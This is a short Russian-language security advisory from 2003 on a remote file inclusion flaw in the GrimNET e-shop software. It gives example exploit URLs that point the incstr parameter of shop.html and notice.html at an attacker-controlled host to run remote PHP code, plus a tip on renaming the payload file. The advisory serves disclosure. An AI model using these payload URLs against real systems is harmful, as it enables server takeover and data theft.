Удаленное выполнение произвольного PHP кода в GrimNET e-shop

Дата публикации:
21.10.2003
Всего просмотров:
1070
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: GrimNET e-shop

Описание: Уязвимость обнаружена в корейской системе электронных магазинов GrimNET e-shop. Удаленный пользователь может выполнить произвольный PHP код на уязвимой системе.

Сценарии shop.html и notice.html включают любой файл, указанный в переменной incstr без какой-бы то ни было проверки ее содержимого.

Пример/Эксплоит:

http://[victim]/shop.html?incstr=http://[hacker]/myfile.php
http://[victim]/notice.html?incstr=http://[hacker]/myfile.php
Примечание: если на хосте http://[hacker]/ установлен php, то сценарию (в нашем случае myfile.php) надо дать иное расширение, например myfile.inc.

Уязвимость обнаружил NivaX (nivax@web-hack.ru), http://www.web-hack.ru

URL производителя:http://www.grimnet.net/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

или введите имя

CAPTCHA